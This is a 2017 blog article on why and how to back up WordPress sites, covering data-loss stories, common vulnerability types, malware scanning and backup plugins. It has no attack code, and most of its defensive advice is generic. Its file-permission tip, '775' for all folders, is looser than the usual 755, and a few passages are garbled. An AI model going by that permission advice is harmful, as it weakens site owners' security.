2017 promises to be fulfilling. But I’ve a few questions for you:
- Is your website safe from hackers?
- What about technical issues like a server crash?
- How do you plan to restore your site if you lose your data?
If you manage or own a WordPress website or a blog that’s not backed up, you’re at risk of losing everything – YES everything.
Imagine you wake up one morning and see this email from your hosting company that their server crashed due to ‘technical issues’. You realize that you have lost your website with everything.
The hosting company ‘apologizes for the inconvenience.’
Sadly, just because you never created a backup of your 5 years old blog, you lost over 1,000 blog posts due to a ‘technical problem’.
This is, however, just one not-so-hypothetical scenario.
Why you need to backup WordPress database in 2017
Let’s consider a few of the common reasons:
1). To avoid data loss: Perhaps the most common reason as to why you should backup WordPress database is to avoid data loss. This includes all types of data irrespective of how you lose it, such as:
- Accidentally deleting files from the server
- Viruses and malware
- Server updates and technical issues with the server
- Power failures and outages
Crazy Domains, a hosting company, sent this message to their clients one fine morning.
“Due to an unforeseen incident in a storage upgrade the data from your hosting account has unfortunately been irretrievably lost.”
The company only offered $100 to their customers, ridiculously. One of their clients responded:
“My financial losses due to lost email, productivity, support and the need to rebuild my website will total up to $2000.”
The thing is, when you are dealing with a hosting company, anything can happen. Even if they constantly backup your website (as in the case with Crazy Domains), it can still be lost.
The best solution is to keep a backup at your computer so even if the backup service provider fails, you have your data safe on your computer.
2). Avoid financial loss: Pat Flynn, the founder of Smart Passive Income, lost as much as $12,000 when his blog went down for an entire week due to server issues. He migrated his blog and other websites to a new host finally after a week of sleepless nights.
There are multiple types of financial losses associated with a server issue, such as:
- Clients cannot access your website. You lose customers in real-time.
- You might end up losing customer records or even your entire lists.
- Customer accounts on your website can wipe out completely causing you serious money in the long-run.
3). Technical non-server issues: A denial of service attack (DoS attack) is a cyber attack where the attacker makes a resource unavailable to its users. Your website can be a target of a DoS attack and this will restrict your users from accessing your website.
This is what happened to Distribute.IT, one of the Australia’s leading domain name seller.
A DoS attacker targeted their website and their server went offline after every few seconds. The attacker destroyed their servers and they started losing customers. Carl Woerndle says:
“My brother and I knew at this point that our business was gone.”
It took the company almost a year to get over the incident.
Imagine the same happening to your WordPress. Should you have a backup, you can quickly move your website to a new server and let the attacker do what he wants to do with the old server.
WordPress databases are prone to data loss, due to several vulnerabilities. Let’s consider some of them.
Eight WordPress vulnerabilities
WordPress is the most used and the most famous CMS. It has 65% market share, and it hosts 25% of the websites and blogs all around the world.
Due to its popularity, a fairly large number of WordPress websites are compromised. In the first quarter of 2016, 78% of the hacked websites were using WordPress, according to Sucuri.
If you are using WordPress, you should make sure your website isn’t vulnerable.
Wordfence published a report that shows the top WordPress vulnerabilities. The image below shows how hacked websites were compromised. In order to make your website secure and hack-proof, you should focus on following factors:
- Brute force
- File permissions
- File upload
- Cross-Site Scripting (XSS)
Let’s discuss these vulnerabilities individually and see how you can protect your WordPress website from getting hacked.
1). WordPress plugins
Plugins are the backbone of WordPress. There are more than 43K plugins available for download. These plugins are add-ons that come in the form of tiny snippets and help users add more features to their WordPress website.
Since they are widely used, therefore, it is easier for a potential hacker to attack your website via a plugin. WordPress plugin accounts for 56% of all WordPress vulnerabilities.
You have to be extremely careful when downloading a new plugin.
Sucuri reported that 25% of the WordPress websites that were compromised in the first quarter of 2016 due to a plugin had one of these three plugins installed:
- Gravity forms
Though these three plugins have been fixed but there are thousands of other plugins that can be a threat to your website’s security.
Here are a few tips to keep your website protected from plugin vulnerabilities:
- Update plugins whenever there is an update available. Developers fix vulnerabilities when they find it and send an update immediately. If you do not update the plugin, you might be using the same old version. For instance, Gravity Forms vulnerability has been fixed by uploading an arbitrary file. Those who haven’t updated the Gravity Forms and are still using the same old vulnerable plugin.
- Download plugins from reputable websites. The best place is none other than WordPress official plugin repository. Refrain from downloading plugins from unknown websites.
- Do not download a plugin that has not been updated in 6 months. This means the plugin has been abandoned and the developer is no more working on the plugin. Such abandoned plugins stay in the repository. They are the biggest threat to your website.
- A quick search of the plugin in Google will show you how good or bad a plugin is. For instance, if you interested in downloading Contact Form 7, run a search query in Google ‘contact form 7 vulnerability’ to see if it has ever been a source of risk to webmasters.
2). Brute force
A brute force attack is a technique used to get the username and/or password of your website. The potential hacker uses a software to generate multiple combinations to guess the username and password.
Brute force attacks on WordPress websites account for 16% of total vulnerabilities.
Sucuri published a report on the number of login attempts that it tracks and stops on the websites that it protects. The figures are staggering.
Several million brute force attacks are tracked in a single day and remember, this is only those websites that are protected by Sucuri. There are millions of other WordPress sites that are not protected by Sucuri.
Wordfence recently reported that it saw a massive increase in the number of brute force attacks on the websites that it tracks.
They also tracked the IP address, number of attacks, host name, and other information about the attackers.
The best approach to avoiding these attacks on your website is to stop use the ‘admin’ as the username as it gets a whole lot easier for the attackers to guess this username.
Other security measures you can take include:
- Change password often.
- Use strong passwords.
- Enable two-step authentication for WordPress.
3). WordPress core
WordPress Core refers to the WordPress files that shape the appearance and functionality of the WordPress. When you install WordPress, you actually install its core files.
WordPress core files are vulnerable too. The chart below shows the most vulnerable core versions. The WordPress version 3.0 and 3.0.1 were the most vulnerable with 15 vulnerabilities each.
Here is a list of the latest core vulnerabilities. It is recommended to keep a track of the latest vulnerabilities and fix them as soon as possible.
If you don’t, you might end up having serious issues with your website.
Keep WordPress updated. As soon as you receive an alert to update WordPress, do it right away. When you update WordPress, do not forget to create the latest backup of your website before you proceed with the update.
4). WordPress themes
As much as 14% of WordPress vulnerabilities are associated with WordPress themes. When you download a new WordPress theme for your website, you are potentially at risk and might end up downloading a vulnerable theme.
In 2016, Elegant Themes issued a security alert and said that it found vulnerabilities in a couple themes and three of its plugins. These vulnerabilities allow attackers to get access to your themes and they can then damage your website, steal information, or can do anything. You do not have any idea.
Anyone using a theme with a loophole is at risk irrespective of the size of your website and database.
What you should do is update your themes and keep them updated. If you are not using a theme, better remove it. There is no point in keeping the theme.
The website host that you choose plays a significant role in making your website susceptible. As much as 41% WordPress blogs are hacked due to poor hosting or hosting vulnerabilities.
Any host can be hacked, even the best ones around.
Interestingly, when you approach your hosting company for such issues, they will most likely decline any claims that someone hacked your website through their website. This is where things get tough.
The idea is to use one of the best hosting companies that is reputable and is famous for security and premium customer support because when your website gets hacked, you need some serious support.
Most of the hosting companies, unfortunately, will always blame their customers for the hack.
The best you can do is stay miles away from cheap hosts. Hosting your website on a cheap host is like building a house on top of a glacier.
6). File permissions
Your website consists of a database of folders and files. Not everyone can read, write, and execute the files. There are certain file permissions that allow users, group, and others to read, write, execute the files.
These file permissions help you secure your website and at the same time, you can make your website vulnerable.
For instance, if WordPress core files and folders can be read, write, and executed by anyone, it will make the life of a potential hacker extremely easy.
According to WordPress, all folders should have 775 permission while files should have 644. This default permission will make your website secure.
Wordfence has a nice guide that shows you how to restrict access to files and folders.
7). File upload
Wordfence analyzed 1600 WordPress websites for 14 months and found that file upload is the third most common vulnerability type. Around 10% of the websites were hacked using file uploads.
In most simple form, it is a type of vulnerability when you accept URLs from the site visitors and then later visit the URL for fetching or downloading the file on your server. Anyone can have any file uploaded on the server.
This is what exactly happened with the TimThumb vulnerability. It allowed developers to specify an image URL that was later fetched by the TimThumb’s PHP file.
Here are a few easy ways to avoid file upload vulnerability:
- Make all downloaded files non-executable.
- Only accept downloads from known users.
- Only accept specific file extensions.
- Check file extension before fetching it.
8). Cross-Site Scripting (XSS)
It is a type of vulnerability where an attacker injects a script to a web page that is viewed by the users. The browser renders the script and it is executed.
The following two guides will help you secure your WordPress website from XSS attacks:
How to scan WordPress website for malware
Having knowledge of WordPress vulnerabilities isn’t enough. If you cannot scan your website for possible malware and cannot detect vulnerabilities, you won’t be able to protect your website.
It is time to scan your WordPress website for malware.
There are three ways to do it:
- Use a plugin
- Use a website scanner tool
- Do it manually
i). Use a plugin
The easiest way to scan your website for malware is to use a security plugin that comes with a scanning feature. The most used malware detection plugin is Wordfence Security plugin.
It comes with several features such as firewall, scanning, blocking, monitoring, and several others. It scans your entire website for malware.
It compares the core files, themes, and plugins on your database with the WordPress repository. Any inconsistency will be reported. The scan will detect all such changes and you can easily identify if you have made the change in the file or someone else has done it.
It scans for known malware (over 44K) and backdoors. It is a must have plugin for WordPress websites.
Sucuri Security is another well-known plugin that scans your website for malicious codes and malware. It keeps a track of all the changes in your website. You can track these changes to detect malware.
ii). Use a website checker tool
Online website checker tools have made things easier. You can easily run a free scanner to detect malware. There are several tools (free and premium) out there but the best among them is none other than Sucuri SiteCheck.
It only costs $16.66 a month to scan your website and keep it protected from malware, brute force attacks, and all types of vulnerabilities.
Using the free scan tool is super-easy. You just have to insert the URL and click scan website.
It will take a few minutes to completely scan your website. You will be notified of the results immediately with the free scan.
The free scan will give you an overview of your website’s current standing. You can subscribe to the monthly plan for regular scanning.
iii). Manual detection
Detecting malware on your website manually is a bit hard and technical. Not everyone can do it. The technique involves manually scanning or skimming the codes and WordPress files so if you do not know anything about files and codes, it is not a recommended method for you.
The idea is to look for inconsistency in the files, themes, core, and plugins. Those who are familiar with PHP can understand the code and easily detect inconsistency in the files. Those who are not familiar might have to compare the files with the original files in the WordPress repository.
Clearly, this is a time-consuming technique.
But there are still people out there who prefer scanning malware manually. Scanning tools can misreport but manual scanning doesn’t leave any stone unturned.
Warning: Don’t go for manual scanning if you’re not sure what you’re doing.
WordPress backup and restore plugins and software
Let’s come to the point.
The whole idea is to backup your website so that if, at any stage, something goes wrong, you can restore your website quickly without losing customers and money.
Here is a list of some of the best WordPress backup and restore tools and plugins.
It is a simple plugin with an easy-to-use interface. It allows you to create backups manually or you can schedule them. The backups can be stored in the cloud. It supports a whole lot of services including S3, Google Drive, Dropbox, FTP, OneDrive, and many others. You can upload everything ranging from plugins to themes to uploads.
Above all, UpdraftPlus is a free plugin. You can enjoy all these features with the free version.
The premium version adds a whole lot of other add-ons such as encryption, site cloning, and several others.
VaultPress has 30K active installs with 4.4 rating. Quite impressive but sine it is not free, therefore, a quite good chunk of webmasters cannot use it – even if they desperately wish to.
It allows quick backups and restoration. You can put everything on autopilot. With their scheduler, backups will be created automatically.
Besides backups, VaultPress fixes vulnerabilities as well. It comes with a scanning feature that detects and fixes malware. This ensures that your backups are free from all types of malware.
It is a premium plugin that is developed by iThemes. Unlike other premium backup plugins, it doesn’t charge you monthly instead you just have to pay once, and the plugin is yours for the lifetime. Though there is yearly subscription but you can choose to pay a one-time fee.
BackupBuddy creates a full backup of your entire website on complete autopilot. The backups can be stored on cloud services like Stash, S3, Google Drive, and others. You get 1GB of free space for Stash, which is quite enough for a single blog.
Some other exclusive features include:
- Malware scanning
- Ability to exclude certain files
- Database repair
- Storage limits
- URL replacement
- Change host without downtime
It’s a primarily a cloning plugin that helps moving WordPress websites from one host to another smoothly. But it is widely used as a backup and restoration plugin too.
Duplicator has over 900K active installs with 4.9 rating. Only 16 users rated it one star. This is clearly one awesome plugin that is best for small-scale users.
You can create auto-backups, migrate, and store backups on the cloud. It supports all the leading cloud storage services including Google Drive, S3, Dropbox, and several others.
You can use the free version with basic features or you can choose to switch to the Duplicate Pro to get access to all the features.
Migrating your website or changing the host becomes a piece of cake with it. It can do it without any downtime.
e). BackUp WordPress
BackUp WordPress allows scheduling and it supports storage on the cloud. With the free version, you can store the backup on your computer or you can have it send to you via email. To get access to all the features, you have to buy it.
Some other interesting features include:
- It works with shared hosting. This is what makes it a perfect backup plugin for beginners.
- Works on Windows and Linux servers.
- The plugin interface can be translated into several other languages like Spanish, German, Dutch, etc.
- It supports multiple backup schedules.
BackWPup has schedule feature, you can store backup to the cloud, check, repair, and optimize database, choose which files to backup, and importantly creates backups in several formats (for email).
It supports a whole lot of cloud services including Google Drive, Dropbox, S3, SugarSync, RackSpace, and others. Did I mention you get these services for free?
The pro package comes with additional features that make it even better.
g). WordPress Backup to Dropbox
It is a completely free backup plugin that syncs the backup with Dropbox only. Unfortunately, it doesn’t have a restore feature but you can restore the backup file through WordPress Import feature.
WordPress Backup to Dropbox is a perfect plugin for businesses that use Dropbox as their primary cloud service. Instead of installing other plugins that offer a whole lot of features that you do not intend to use, download this tiny plugin. It will reduce the load on your server.
It supports scheduling feature and is available in multiple languages including Arabic, Spanish, French, Chinese, Russian, and several others.
With over 400K active installs and 4.6 rating, this simple backup and restoration plugin is the simplest in the town.
WP-DB-Backup only backup WordPress database. It means it will not backup any media files (like images). It is, therefore, a perfect solution for websites that only post text (such as PBNs) or with minimal media. You have to upload media files manually.
You can create backups and restore your database with a few clicks. Importantly, it has a schedule feature.
WP-DB-Backup is probably best for small websites that are not updated very often.
BlogVault is a decent choice for WordPress websites that prefer saving the backup to Dropbox without using local storage. This plugin doesn’t consume local storage thus it doesn’t consume your website’s resources.
BlogVault has over 20K installs with 4.3 star rating. It is helpful in creating backups, restoring, website migration, real-time backups, incremental backups, and encryption.
One of the most prominent and unique features is test restore. It allows you to restore a backup of your website, test it, and ensure that it works properly. If it does, you can then restore the same, else you can try another. This feature is extremely handy in terms of keeping your website live all the time.
Some other features include:
- 30-day backup history
- All the backups are encrypted making your data safe
- Simple restoration
- Real-time backup ensures that you do not lose any data and everything is moved to Dropbox in real-time
j). CYAN Backup
It is a clean and simple WordPress backup plugin that has the potential to create backups hourly. You can backup your website several times a day. This plugin is great for websites that update several times a day.
CYAN Backup has schedule option but it doesn’t support cloud. It, however, includes remote storage such as FTP and FTPS.
If you have a small website that is updated daily or multiple times a day, you should use this plugin. The only drawback is that it doesn’t offer restore service.
Simple backup rules
Before you backup a WordPress website, make sure you follow these rules:
- Keep three different backups at different locations, as suggested by WordPress Codex. At times, the backup files crash. For safety reasons, make sure you have backups stored in different locations.
- Exclude files from the backup that you do not need. It is useless to backup plugins and themes that you do not intend to use. Remove files, folders, plugins, and themes that you do not use.
- Once a month, create a manual backup of your entire website. Manual backups are more reliable as compared to automated scheduled backups. Do not trust automated backups too much.
- Always check the backup file once a month to see if it really is what you need. It is not a bad idea either to test restore a backup once a month.
- Backup your website before upgrading WordPress or before making major changes to your WordPress blog.
Time spent on backup is never wasted. You will never regret all the time spent on dealing with backups. It will pay off one bad day.
The safety of your website is in your own hands. Scan your website for malware. Once it has been cleaned, then and only then, create its backup. Creating backup of a website with malware will do more harm than good.